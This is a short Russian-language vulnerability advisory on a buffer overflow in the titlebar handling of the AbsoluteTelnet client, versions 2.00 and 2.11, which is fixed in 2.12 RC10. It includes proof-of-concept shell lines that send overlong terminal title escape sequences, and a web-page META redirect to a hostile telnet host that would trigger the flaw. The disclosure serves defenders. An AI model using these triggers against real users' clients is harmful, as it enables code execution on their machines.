Переполнение буфера обнаружено в AbsoluteTelnet. Удаленный атакующий может выполнить произвольный код с пользовательскими привилегиями.
Переполнение обнаружено в функции titlebar. Пример: 

export KNUD=`perl -e 'print "A" x 174'`
echo -ne "\033]0;$KNUD\007"

export KNUD=`perl -e 'print "A" x 296'`
echo -ne "\033]0;$KNUD\007"

Если AbsoluteTelnet клиент конфигурирован как telnet клиент по умолчанию, то уязвимость может использоваться через специально сформированную Web страницу. Пример: 

<META HTTP-EQUIV="Refresh" CONTENT="0;URL=telnet://hostile.serv.er">

Уязвимость обнаружена в AbsoluteTelnet 2.00, 2.11 и устранена в 2.12 RC10

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии